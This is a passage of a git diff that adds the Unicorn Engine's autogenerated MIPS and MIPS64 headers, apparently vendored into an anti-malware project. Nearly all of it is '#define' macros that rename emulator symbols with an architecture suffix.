helper_r6_cmp_d_sor_mips +#define helper_r6_cmp_d_sune 
helper_r6_cmp_d_sune_mips +#define helper_r6_cmp_d_sne helper_r6_cmp_d_sne_mips +#define helper_r6_cmp_s_af helper_r6_cmp_s_af_mips +#define helper_r6_cmp_s_un helper_r6_cmp_s_un_mips +#define helper_r6_cmp_s_eq helper_r6_cmp_s_eq_mips +#define helper_r6_cmp_s_ueq helper_r6_cmp_s_ueq_mips +#define helper_r6_cmp_s_lt helper_r6_cmp_s_lt_mips +#define helper_r6_cmp_s_ult helper_r6_cmp_s_ult_mips +#define helper_r6_cmp_s_le helper_r6_cmp_s_le_mips +#define helper_r6_cmp_s_ule helper_r6_cmp_s_ule_mips +#define helper_r6_cmp_s_saf helper_r6_cmp_s_saf_mips +#define helper_r6_cmp_s_sun helper_r6_cmp_s_sun_mips +#define helper_r6_cmp_s_seq helper_r6_cmp_s_seq_mips +#define helper_r6_cmp_s_sueq helper_r6_cmp_s_sueq_mips +#define helper_r6_cmp_s_slt helper_r6_cmp_s_slt_mips +#define helper_r6_cmp_s_sult helper_r6_cmp_s_sult_mips +#define helper_r6_cmp_s_sle helper_r6_cmp_s_sle_mips +#define helper_r6_cmp_s_sule helper_r6_cmp_s_sule_mips +#define helper_r6_cmp_s_or helper_r6_cmp_s_or_mips +#define helper_r6_cmp_s_une helper_r6_cmp_s_une_mips +#define helper_r6_cmp_s_ne helper_r6_cmp_s_ne_mips +#define helper_r6_cmp_s_sor helper_r6_cmp_s_sor_mips +#define helper_r6_cmp_s_sune helper_r6_cmp_s_sune_mips +#define helper_r6_cmp_s_sne helper_r6_cmp_s_sne_mips +#define helper_msa_ld_df helper_msa_ld_df_mips +#define helper_msa_st_df helper_msa_st_df_mips +#define no_mmu_map_address no_mmu_map_address_mips +#define fixed_mmu_map_address fixed_mmu_map_address_mips +#define r4k_map_address r4k_map_address_mips +#define mips_cpu_get_phys_page_debug mips_cpu_get_phys_page_debug_mips +#define mips_cpu_handle_mmu_fault mips_cpu_handle_mmu_fault_mips +#define cpu_mips_translate_address cpu_mips_translate_address_mips +#define exception_resume_pc exception_resume_pc_mips +#define mips_cpu_do_interrupt mips_cpu_do_interrupt_mips +#define mips_cpu_exec_interrupt mips_cpu_exec_interrupt_mips +#define r4k_invalidate_tlb r4k_invalidate_tlb_mips +#define helper_absq_s_ob helper_absq_s_ob_mips 
+#define helper_absq_s_qh helper_absq_s_qh_mips +#define helper_absq_s_pw helper_absq_s_pw_mips +#define helper_adduh_ob helper_adduh_ob_mips +#define helper_adduh_r_ob helper_adduh_r_ob_mips +#define helper_subuh_ob helper_subuh_ob_mips +#define helper_subuh_r_ob helper_subuh_r_ob_mips +#define helper_addq_pw helper_addq_pw_mips +#define helper_addq_qh helper_addq_qh_mips +#define helper_addq_s_pw helper_addq_s_pw_mips +#define helper_addq_s_qh helper_addq_s_qh_mips +#define helper_addu_ob helper_addu_ob_mips +#define helper_addu_qh helper_addu_qh_mips +#define helper_addu_s_ob helper_addu_s_ob_mips +#define helper_addu_s_qh helper_addu_s_qh_mips +#define helper_subq_pw helper_subq_pw_mips +#define helper_subq_qh helper_subq_qh_mips +#define helper_subq_s_pw helper_subq_s_pw_mips +#define helper_subq_s_qh helper_subq_s_qh_mips +#define helper_subu_ob helper_subu_ob_mips +#define helper_subu_qh helper_subu_qh_mips +#define helper_subu_s_ob helper_subu_s_ob_mips +#define helper_subu_s_qh helper_subu_s_qh_mips +#define helper_raddu_l_ob helper_raddu_l_ob_mips +#define helper_precr_ob_qh helper_precr_ob_qh_mips +#define helper_precr_sra_qh_pw helper_precr_sra_qh_pw_mips +#define helper_precr_sra_r_qh_pw helper_precr_sra_r_qh_pw_mips +#define helper_precrq_ob_qh helper_precrq_ob_qh_mips +#define helper_precrq_qh_pw helper_precrq_qh_pw_mips +#define helper_precrq_rs_qh_pw helper_precrq_rs_qh_pw_mips +#define helper_precrq_pw_l helper_precrq_pw_l_mips +#define helper_precrqu_s_ob_qh helper_precrqu_s_ob_qh_mips +#define helper_preceq_pw_qhl helper_preceq_pw_qhl_mips +#define helper_preceq_pw_qhr helper_preceq_pw_qhr_mips +#define helper_preceq_pw_qhla helper_preceq_pw_qhla_mips +#define helper_preceq_pw_qhra helper_preceq_pw_qhra_mips +#define helper_precequ_qh_obl helper_precequ_qh_obl_mips +#define helper_precequ_qh_obr helper_precequ_qh_obr_mips +#define helper_precequ_qh_obla helper_precequ_qh_obla_mips +#define helper_precequ_qh_obra helper_precequ_qh_obra_mips 
+#define helper_preceu_qh_obl helper_preceu_qh_obl_mips +#define helper_preceu_qh_obr helper_preceu_qh_obr_mips +#define helper_preceu_qh_obla helper_preceu_qh_obla_mips +#define helper_preceu_qh_obra helper_preceu_qh_obra_mips +#define helper_shll_ob helper_shll_ob_mips +#define helper_shrl_ob helper_shrl_ob_mips +#define helper_shra_ob helper_shra_ob_mips +#define helper_shra_r_ob helper_shra_r_ob_mips +#define helper_shll_qh helper_shll_qh_mips +#define helper_shll_s_qh helper_shll_s_qh_mips +#define helper_shrl_qh helper_shrl_qh_mips +#define helper_shra_qh helper_shra_qh_mips +#define helper_shra_r_qh helper_shra_r_qh_mips +#define helper_shll_pw helper_shll_pw_mips +#define helper_shll_s_pw helper_shll_s_pw_mips +#define helper_shra_pw helper_shra_pw_mips +#define helper_shra_r_pw helper_shra_r_pw_mips +#define helper_muleu_s_qh_obl helper_muleu_s_qh_obl_mips +#define helper_muleu_s_qh_obr helper_muleu_s_qh_obr_mips +#define helper_mulq_rs_qh helper_mulq_rs_qh_mips +#define helper_muleq_s_pw_qhl helper_muleq_s_pw_qhl_mips +#define helper_muleq_s_pw_qhr helper_muleq_s_pw_qhr_mips +#define helper_mulsaq_s_w_qh helper_mulsaq_s_w_qh_mips +#define helper_dpau_h_obl helper_dpau_h_obl_mips +#define helper_dpau_h_obr helper_dpau_h_obr_mips +#define helper_dpsu_h_obl helper_dpsu_h_obl_mips +#define helper_dpsu_h_obr helper_dpsu_h_obr_mips +#define helper_dpa_w_qh helper_dpa_w_qh_mips +#define helper_dpaq_s_w_qh helper_dpaq_s_w_qh_mips +#define helper_dps_w_qh helper_dps_w_qh_mips +#define helper_dpsq_s_w_qh helper_dpsq_s_w_qh_mips +#define helper_dpaq_sa_l_pw helper_dpaq_sa_l_pw_mips +#define helper_dpsq_sa_l_pw helper_dpsq_sa_l_pw_mips +#define helper_mulsaq_s_l_pw helper_mulsaq_s_l_pw_mips +#define helper_maq_s_w_qhll helper_maq_s_w_qhll_mips +#define helper_maq_s_w_qhlr helper_maq_s_w_qhlr_mips +#define helper_maq_s_w_qhrl helper_maq_s_w_qhrl_mips +#define helper_maq_s_w_qhrr helper_maq_s_w_qhrr_mips +#define helper_maq_sa_w_qhll helper_maq_sa_w_qhll_mips +#define 
helper_maq_sa_w_qhlr helper_maq_sa_w_qhlr_mips +#define helper_maq_sa_w_qhrl helper_maq_sa_w_qhrl_mips +#define helper_maq_sa_w_qhrr helper_maq_sa_w_qhrr_mips +#define helper_maq_s_l_pwl helper_maq_s_l_pwl_mips +#define helper_maq_s_l_pwr helper_maq_s_l_pwr_mips +#define helper_dmadd helper_dmadd_mips +#define helper_dmaddu helper_dmaddu_mips +#define helper_dmsub helper_dmsub_mips +#define helper_dmsubu helper_dmsubu_mips +#define helper_dinsv helper_dinsv_mips +#define helper_cmpgu_eq_ob helper_cmpgu_eq_ob_mips +#define helper_cmpgu_lt_ob helper_cmpgu_lt_ob_mips +#define helper_cmpgu_le_ob helper_cmpgu_le_ob_mips +#define helper_cmpu_eq_ob helper_cmpu_eq_ob_mips +#define helper_cmpu_lt_ob helper_cmpu_lt_ob_mips +#define helper_cmpu_le_ob helper_cmpu_le_ob_mips +#define helper_cmp_eq_qh helper_cmp_eq_qh_mips +#define helper_cmp_lt_qh helper_cmp_lt_qh_mips +#define helper_cmp_le_qh helper_cmp_le_qh_mips +#define helper_cmp_eq_pw helper_cmp_eq_pw_mips +#define helper_cmp_lt_pw helper_cmp_lt_pw_mips +#define helper_cmp_le_pw helper_cmp_le_pw_mips +#define helper_cmpgdu_eq_ob helper_cmpgdu_eq_ob_mips +#define helper_cmpgdu_lt_ob helper_cmpgdu_lt_ob_mips +#define helper_cmpgdu_le_ob helper_cmpgdu_le_ob_mips +#define helper_pick_ob helper_pick_ob_mips +#define helper_pick_qh helper_pick_qh_mips +#define helper_pick_pw helper_pick_pw_mips +#define helper_packrl_pw helper_packrl_pw_mips +#define helper_dextr_w helper_dextr_w_mips +#define helper_dextr_r_w helper_dextr_r_w_mips +#define helper_dextr_rs_w helper_dextr_rs_w_mips +#define helper_dextr_l helper_dextr_l_mips +#define helper_dextr_r_l helper_dextr_r_l_mips +#define helper_dextr_rs_l helper_dextr_rs_l_mips +#define helper_dextr_s_h helper_dextr_s_h_mips +#define helper_dextp helper_dextp_mips +#define helper_dextpdp helper_dextpdp_mips +#define helper_dshilo helper_dshilo_mips +#define helper_dmthlip helper_dmthlip_mips +#define helper_dclo helper_dclo_mips +#define helper_dclz helper_dclz_mips +#define 
helper_dbitswap helper_dbitswap_mips +#define helper_lld helper_lld_mips +#define helper_scd helper_scd_mips +#define helper_sdl helper_sdl_mips +#define helper_sdr helper_sdr_mips +#define helper_ldm helper_ldm_mips +#define helper_sdm helper_sdm_mips +#define helper_dmfc0_tcrestart helper_dmfc0_tcrestart_mips +#define helper_dmfc0_tchalt helper_dmfc0_tchalt_mips +#define helper_dmfc0_tccontext helper_dmfc0_tccontext_mips +#define helper_dmfc0_tcschedule helper_dmfc0_tcschedule_mips +#define helper_dmfc0_tcschefback helper_dmfc0_tcschefback_mips +#define helper_dmfc0_lladdr helper_dmfc0_lladdr_mips +#define helper_dmfc0_watchlo helper_dmfc0_watchlo_mips +#define helper_dmtc0_entrylo0 helper_dmtc0_entrylo0_mips +#define helper_dmtc0_entrylo1 helper_dmtc0_entrylo1_mips +#define mips_reg_reset mips_reg_reset_mips +#define mips_reg_read mips_reg_read_mips +#define mips_reg_write mips_reg_write_mips +#define mips_tcg_init mips_tcg_init_mips +#define mips_cpu_list mips_cpu_list_mips +#define mips_release mips_release_mips +#define MIPS64_REGS_STORAGE_SIZE MIPS64_REGS_STORAGE_SIZE_mips +#define MIPS_REGS_STORAGE_SIZE MIPS_REGS_STORAGE_SIZE_mips +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/mips64.h b/ai_anti_malware/unicorn/unicorn-master/qemu/mips64.h new file mode 100644 index 0000000..e464d4b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/mips64.h @@ -0,0 +1,3928 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_MIPS64_H +#define UNICORN_AUTOGEN_MIPS64_H +#define arm_release arm_release_mips64 +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_mips64 +#define ppc_tb_set_jmp_target ppc_tb_set_jmp_target_mips64 +#define use_idiv_instructions_rt use_idiv_instructions_rt_mips64 +#define tcg_target_deposit_valid tcg_target_deposit_valid_mips64 +#define helper_power_down helper_power_down_mips64 +#define check_exit_request check_exit_request_mips64 +#define address_space_unregister 
address_space_unregister_mips64 +#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_mips64 +#define phys_mem_clean phys_mem_clean_mips64 +#define tb_cleanup tb_cleanup_mips64 +#define memory_map memory_map_mips64 +#define memory_map_ptr memory_map_ptr_mips64 +#define memory_unmap memory_unmap_mips64 +#define memory_free memory_free_mips64 +#define free_code_gen_buffer free_code_gen_buffer_mips64 +#define helper_raise_exception helper_raise_exception_mips64 +#define tcg_enabled tcg_enabled_mips64 +#define tcg_exec_init tcg_exec_init_mips64 +#define memory_register_types memory_register_types_mips64 +#define cpu_exec_init_all cpu_exec_init_all_mips64 +#define vm_start vm_start_mips64 +#define resume_all_vcpus resume_all_vcpus_mips64 +#define a15_l2ctlr_read a15_l2ctlr_read_mips64 +#define a64_translate_init a64_translate_init_mips64 +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_mips64 +#define aa64_cacheop_access aa64_cacheop_access_mips64 +#define aa64_daif_access aa64_daif_access_mips64 +#define aa64_daif_write aa64_daif_write_mips64 +#define aa64_dczid_read aa64_dczid_read_mips64 +#define aa64_fpcr_read aa64_fpcr_read_mips64 +#define aa64_fpcr_write aa64_fpcr_write_mips64 +#define aa64_fpsr_read aa64_fpsr_read_mips64 +#define aa64_fpsr_write aa64_fpsr_write_mips64 +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_mips64 +#define aa64_zva_access aa64_zva_access_mips64 +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_mips64 +#define aarch64_restore_sp aarch64_restore_sp_mips64 +#define aarch64_save_sp aarch64_save_sp_mips64 +#define accel_find accel_find_mips64 +#define accel_init_machine accel_init_machine_mips64 +#define accel_type accel_type_mips64 +#define access_with_adjusted_size access_with_adjusted_size_mips64 +#define add128 add128_mips64 +#define add16_sat add16_sat_mips64 +#define add16_usat add16_usat_mips64 +#define add192 add192_mips64 +#define add8_sat add8_sat_mips64 +#define 
add8_usat add8_usat_mips64 +#define add_cpreg_to_hashtable add_cpreg_to_hashtable_mips64 +#define add_cpreg_to_list add_cpreg_to_list_mips64 +#define addFloat128Sigs addFloat128Sigs_mips64 +#define addFloat32Sigs addFloat32Sigs_mips64 +#define addFloat64Sigs addFloat64Sigs_mips64 +#define addFloatx80Sigs addFloatx80Sigs_mips64 +#define add_qemu_ldst_label add_qemu_ldst_label_mips64 +#define address_space_access_valid address_space_access_valid_mips64 +#define address_space_destroy address_space_destroy_mips64 +#define address_space_destroy_dispatch address_space_destroy_dispatch_mips64 +#define address_space_get_flatview address_space_get_flatview_mips64 +#define address_space_init address_space_init_mips64 +#define address_space_init_dispatch address_space_init_dispatch_mips64 +#define address_space_lookup_region address_space_lookup_region_mips64 +#define address_space_map address_space_map_mips64 +#define address_space_read address_space_read_mips64 +#define address_space_rw address_space_rw_mips64 +#define address_space_translate address_space_translate_mips64 +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_mips64 +#define address_space_translate_internal address_space_translate_internal_mips64 +#define address_space_unmap address_space_unmap_mips64 +#define address_space_update_topology address_space_update_topology_mips64 +#define address_space_update_topology_pass address_space_update_topology_pass_mips64 +#define address_space_write address_space_write_mips64 +#define addrrange_contains addrrange_contains_mips64 +#define addrrange_end addrrange_end_mips64 +#define addrrange_equal addrrange_equal_mips64 +#define addrrange_intersection addrrange_intersection_mips64 +#define addrrange_intersects addrrange_intersects_mips64 +#define addrrange_make addrrange_make_mips64 +#define adjust_endianness adjust_endianness_mips64 +#define all_helpers all_helpers_mips64 +#define alloc_code_gen_buffer alloc_code_gen_buffer_mips64 +#define 
alloc_entry alloc_entry_mips64 +#define always_true always_true_mips64 +#define arm1026_initfn arm1026_initfn_mips64 +#define arm1136_initfn arm1136_initfn_mips64 +#define arm1136_r2_initfn arm1136_r2_initfn_mips64 +#define arm1176_initfn arm1176_initfn_mips64 +#define arm11mpcore_initfn arm11mpcore_initfn_mips64 +#define arm926_initfn arm926_initfn_mips64 +#define arm946_initfn arm946_initfn_mips64 +#define arm_ccnt_enabled arm_ccnt_enabled_mips64 +#define arm_cp_read_zero arm_cp_read_zero_mips64 +#define arm_cp_reset_ignore arm_cp_reset_ignore_mips64 +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_mips64 +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_mips64 +#define arm_cpu_finalizefn arm_cpu_finalizefn_mips64 +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_mips64 +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_mips64 +#define arm_cpu_initfn arm_cpu_initfn_mips64 +#define arm_cpu_list arm_cpu_list_mips64 +#define cpu_loop_exit cpu_loop_exit_mips64 +#define arm_cpu_post_init arm_cpu_post_init_mips64 +#define arm_cpu_realizefn arm_cpu_realizefn_mips64 +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_mips64 +#define arm_cpu_register_types arm_cpu_register_types_mips64 +#define cpu_resume_from_signal cpu_resume_from_signal_mips64 +#define arm_cpus arm_cpus_mips64 +#define arm_cpu_set_pc arm_cpu_set_pc_mips64 +#define arm_cp_write_ignore arm_cp_write_ignore_mips64 +#define arm_current_el arm_current_el_mips64 +#define arm_dc_feature arm_dc_feature_mips64 +#define arm_debug_excp_handler arm_debug_excp_handler_mips64 +#define arm_debug_target_el arm_debug_target_el_mips64 +#define arm_el_is_aa64 arm_el_is_aa64_mips64 +#define arm_env_get_cpu arm_env_get_cpu_mips64 +#define arm_excp_target_el arm_excp_target_el_mips64 +#define arm_excp_unmasked arm_excp_unmasked_mips64 +#define arm_feature arm_feature_mips64 +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_mips64 +#define 
gen_intermediate_code gen_intermediate_code_mips64 +#define gen_intermediate_code_pc gen_intermediate_code_pc_mips64 +#define arm_gen_test_cc arm_gen_test_cc_mips64 +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_mips64 +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_mips64 +#define arm_handle_psci_call arm_handle_psci_call_mips64 +#define arm_is_psci_call arm_is_psci_call_mips64 +#define arm_is_secure arm_is_secure_mips64 +#define arm_is_secure_below_el3 arm_is_secure_below_el3_mips64 +#define arm_ldl_code arm_ldl_code_mips64 +#define arm_lduw_code arm_lduw_code_mips64 +#define arm_log_exception arm_log_exception_mips64 +#define arm_reg_read arm_reg_read_mips64 +#define arm_reg_reset arm_reg_reset_mips64 +#define arm_reg_write arm_reg_write_mips64 +#define restore_state_to_opc restore_state_to_opc_mips64 +#define arm_rmode_to_sf arm_rmode_to_sf_mips64 +#define arm_singlestep_active arm_singlestep_active_mips64 +#define tlb_fill tlb_fill_mips64 +#define tlb_flush tlb_flush_mips64 +#define tlb_flush_page tlb_flush_page_mips64 +#define tlb_set_page tlb_set_page_mips64 +#define arm_translate_init arm_translate_init_mips64 +#define arm_v7m_class_init arm_v7m_class_init_mips64 +#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_mips64 +#define ats_access ats_access_mips64 +#define ats_write ats_write_mips64 +#define bad_mode_switch bad_mode_switch_mips64 +#define bank_number bank_number_mips64 +#define bitmap_zero_extend bitmap_zero_extend_mips64 +#define bp_wp_matches bp_wp_matches_mips64 +#define breakpoint_invalidate breakpoint_invalidate_mips64 +#define build_page_bitmap build_page_bitmap_mips64 +#define bus_add_child bus_add_child_mips64 +#define bus_class_init bus_class_init_mips64 +#define bus_info bus_info_mips64 +#define bus_unparent bus_unparent_mips64 +#define cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_mips64 +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_mips64 +#define cache_test_clean_cp_reginfo 
cache_test_clean_cp_reginfo_mips64 +#define call_recip_estimate call_recip_estimate_mips64 +#define can_merge can_merge_mips64 +#define capacity_increase capacity_increase_mips64 +#define ccsidr_read ccsidr_read_mips64 +#define check_ap check_ap_mips64 +#define check_breakpoints check_breakpoints_mips64 +#define check_watchpoints check_watchpoints_mips64 +#define cho cho_mips64 +#define clear_bit clear_bit_mips64 +#define clz32 clz32_mips64 +#define clz64 clz64_mips64 +#define cmp_flatrange_addr cmp_flatrange_addr_mips64 +#define code_gen_alloc code_gen_alloc_mips64 +#define commonNaNToFloat128 commonNaNToFloat128_mips64 +#define commonNaNToFloat16 commonNaNToFloat16_mips64 +#define commonNaNToFloat32 commonNaNToFloat32_mips64 +#define commonNaNToFloat64 commonNaNToFloat64_mips64 +#define commonNaNToFloatx80 commonNaNToFloatx80_mips64 +#define compute_abs_deadline compute_abs_deadline_mips64 +#define cond_name cond_name_mips64 +#define configure_accelerator configure_accelerator_mips64 +#define container_get container_get_mips64 +#define container_info container_info_mips64 +#define container_register_types container_register_types_mips64 +#define contextidr_write contextidr_write_mips64 +#define core_log_global_start core_log_global_start_mips64 +#define core_log_global_stop core_log_global_stop_mips64 +#define core_memory_listener core_memory_listener_mips64 +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_mips64 +#define cortex_a15_initfn cortex_a15_initfn_mips64 +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_mips64 +#define cortex_a8_initfn cortex_a8_initfn_mips64 +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_mips64 +#define cortex_a9_initfn cortex_a9_initfn_mips64 +#define cortex_m3_initfn cortex_m3_initfn_mips64 +#define count_cpreg count_cpreg_mips64 +#define countLeadingZeros32 countLeadingZeros32_mips64 +#define countLeadingZeros64 countLeadingZeros64_mips64 +#define cp_access_ok cp_access_ok_mips64 +#define cpacr_write cpacr_write_mips64 +#define 
cpreg_field_is_64bit cpreg_field_is_64bit_mips64 +#define cp_reginfo cp_reginfo_mips64 +#define cpreg_key_compare cpreg_key_compare_mips64 +#define cpreg_make_keylist cpreg_make_keylist_mips64 +#define cp_reg_reset cp_reg_reset_mips64 +#define cpreg_to_kvm_id cpreg_to_kvm_id_mips64 +#define cpsr_read cpsr_read_mips64 +#define cpsr_write cpsr_write_mips64 +#define cptype_valid cptype_valid_mips64 +#define cpu_abort cpu_abort_mips64 +#define cpu_arm_exec cpu_arm_exec_mips64 +#define cpu_arm_gen_code cpu_arm_gen_code_mips64 +#define cpu_arm_init cpu_arm_init_mips64 +#define cpu_breakpoint_insert cpu_breakpoint_insert_mips64 +#define cpu_breakpoint_remove cpu_breakpoint_remove_mips64 +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_mips64 +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_mips64 +#define cpu_can_do_io cpu_can_do_io_mips64 +#define cpu_can_run cpu_can_run_mips64 +#define cpu_class_init cpu_class_init_mips64 +#define cpu_common_class_by_name cpu_common_class_by_name_mips64 +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_mips64 +#define cpu_common_get_arch_id cpu_common_get_arch_id_mips64 +#define cpu_common_get_memory_mapping cpu_common_get_memory_mapping_mips64 +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_mips64 +#define cpu_common_has_work cpu_common_has_work_mips64 +#define cpu_common_initfn cpu_common_initfn_mips64 +#define cpu_common_noop cpu_common_noop_mips64 +#define cpu_common_parse_features cpu_common_parse_features_mips64 +#define cpu_common_realizefn cpu_common_realizefn_mips64 +#define cpu_common_reset cpu_common_reset_mips64 +#define cpu_dump_statistics cpu_dump_statistics_mips64 +#define cpu_exec_init cpu_exec_init_mips64 +#define cpu_flush_icache_range cpu_flush_icache_range_mips64 +#define cpu_gen_init cpu_gen_init_mips64 +#define cpu_get_clock cpu_get_clock_mips64 +#define cpu_get_real_ticks cpu_get_real_ticks_mips64 +#define cpu_get_tb_cpu_state 
cpu_get_tb_cpu_state_mips64 +#define cpu_handle_debug_exception cpu_handle_debug_exception_mips64 +#define cpu_handle_guest_debug cpu_handle_guest_debug_mips64 +#define cpu_inb cpu_inb_mips64 +#define cpu_inl cpu_inl_mips64 +#define cpu_interrupt cpu_interrupt_mips64 +#define cpu_interrupt_handler cpu_interrupt_handler_mips64 +#define cpu_inw cpu_inw_mips64 +#define cpu_io_recompile cpu_io_recompile_mips64 +#define cpu_is_stopped cpu_is_stopped_mips64 +#define cpu_ldl_code cpu_ldl_code_mips64 +#define cpu_ldub_code cpu_ldub_code_mips64 +#define cpu_lduw_code cpu_lduw_code_mips64 +#define cpu_memory_rw_debug cpu_memory_rw_debug_mips64 +#define cpu_mmu_index cpu_mmu_index_mips64 +#define cpu_outb cpu_outb_mips64 +#define cpu_outl cpu_outl_mips64 +#define cpu_outw cpu_outw_mips64 +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_mips64 +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_mips64 +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_mips64 +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_mips64 +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_mips64 +#define cpu_physical_memory_is_io cpu_physical_memory_is_io_mips64 +#define cpu_physical_memory_map cpu_physical_memory_map_mips64 +#define cpu_physical_memory_range_includes_clean cpu_physical_memory_range_includes_clean_mips64 +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_mips64 +#define cpu_physical_memory_rw cpu_physical_memory_rw_mips64 +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_mips64 +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_mips64 +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_mips64 +#define cpu_physical_memory_write_rom cpu_physical_memory_write_rom_mips64 +#define cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_mips64 +#define cpu_register 
cpu_register_mips64 +#define cpu_register_types cpu_register_types_mips64 +#define cpu_restore_state cpu_restore_state_mips64 +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_mips64 +#define cpu_single_step cpu_single_step_mips64 +#define cpu_tb_exec cpu_tb_exec_mips64 +#define cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_mips64 +#define cpu_to_be64 cpu_to_be64_mips64 +#define cpu_to_le32 cpu_to_le32_mips64 +#define cpu_to_le64 cpu_to_le64_mips64 +#define cpu_type_info cpu_type_info_mips64 +#define cpu_unassigned_access cpu_unassigned_access_mips64 +#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_mips64 +#define cpu_watchpoint_insert cpu_watchpoint_insert_mips64 +#define cpu_watchpoint_remove cpu_watchpoint_remove_mips64 +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_mips64 +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_mips64 +#define crc32c_table crc32c_table_mips64 +#define create_new_memory_mapping create_new_memory_mapping_mips64 +#define csselr_write csselr_write_mips64 +#define cto32 cto32_mips64 +#define ctr_el0_access ctr_el0_access_mips64 +#define ctz32 ctz32_mips64 +#define ctz64 ctz64_mips64 +#define dacr_write dacr_write_mips64 +#define dbgbcr_write dbgbcr_write_mips64 +#define dbgbvr_write dbgbvr_write_mips64 +#define dbgwcr_write dbgwcr_write_mips64 +#define dbgwvr_write dbgwvr_write_mips64 +#define debug_cp_reginfo debug_cp_reginfo_mips64 +#define debug_frame debug_frame_mips64 +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_mips64 +#define define_arm_cp_regs define_arm_cp_regs_mips64 +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_mips64 +#define define_debug_regs define_debug_regs_mips64 +#define define_one_arm_cp_reg define_one_arm_cp_reg_mips64 +#define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_mips64 +#define deposit32 deposit32_mips64 +#define deposit64 deposit64_mips64 +#define deregister_tm_clones 
deregister_tm_clones_mips64 +#define device_class_base_init device_class_base_init_mips64 +#define device_class_init device_class_init_mips64 +#define device_finalize device_finalize_mips64 +#define device_get_realized device_get_realized_mips64 +#define device_initfn device_initfn_mips64 +#define device_post_init device_post_init_mips64 +#define device_reset device_reset_mips64 +#define device_set_realized device_set_realized_mips64 +#define device_type_info device_type_info_mips64 +#define disas_arm_insn disas_arm_insn_mips64 +#define disas_coproc_insn disas_coproc_insn_mips64 +#define disas_dsp_insn disas_dsp_insn_mips64 +#define disas_iwmmxt_insn disas_iwmmxt_insn_mips64 +#define disas_neon_data_insn disas_neon_data_insn_mips64 +#define disas_neon_ls_insn disas_neon_ls_insn_mips64 +#define disas_thumb2_insn disas_thumb2_insn_mips64 +#define disas_thumb_insn disas_thumb_insn_mips64 +#define disas_vfp_insn disas_vfp_insn_mips64 +#define disas_vfp_v8_insn disas_vfp_v8_insn_mips64 +#define do_arm_semihosting do_arm_semihosting_mips64 +#define do_clz16 do_clz16_mips64 +#define do_clz8 do_clz8_mips64 +#define do_constant_folding do_constant_folding_mips64 +#define do_constant_folding_2 do_constant_folding_2_mips64 +#define do_constant_folding_cond do_constant_folding_cond_mips64 +#define do_constant_folding_cond2 do_constant_folding_cond2_mips64 +#define do_constant_folding_cond_32 do_constant_folding_cond_32_mips64 +#define do_constant_folding_cond_64 do_constant_folding_cond_64_mips64 +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_mips64 +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_mips64 +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_mips64 +#define do_ssat do_ssat_mips64 +#define do_usad do_usad_mips64 +#define do_usat do_usat_mips64 +#define do_v7m_exception_exit do_v7m_exception_exit_mips64 +#define dummy_c15_cp_reginfo dummy_c15_cp_reginfo_mips64 +#define dummy_func dummy_func_mips64 +#define dummy_section dummy_section_mips64 +#define 
_DYNAMIC _DYNAMIC_mips64 +#define _edata _edata_mips64 +#define _end _end_mips64 +#define end_list end_list_mips64 +#define eq128 eq128_mips64 +#define ErrorClass_lookup ErrorClass_lookup_mips64 +#define error_copy error_copy_mips64 +#define error_exit error_exit_mips64 +#define error_get_class error_get_class_mips64 +#define error_get_pretty error_get_pretty_mips64 +#define error_setg_file_open error_setg_file_open_mips64 +#define estimateDiv128To64 estimateDiv128To64_mips64 +#define estimateSqrt32 estimateSqrt32_mips64 +#define excnames excnames_mips64 +#define excp_is_internal excp_is_internal_mips64 +#define extended_addresses_enabled extended_addresses_enabled_mips64 +#define extended_mpu_ap_bits extended_mpu_ap_bits_mips64 +#define extract32 extract32_mips64 +#define extract64 extract64_mips64 +#define extractFloat128Exp extractFloat128Exp_mips64 +#define extractFloat128Frac0 extractFloat128Frac0_mips64 +#define extractFloat128Frac1 extractFloat128Frac1_mips64 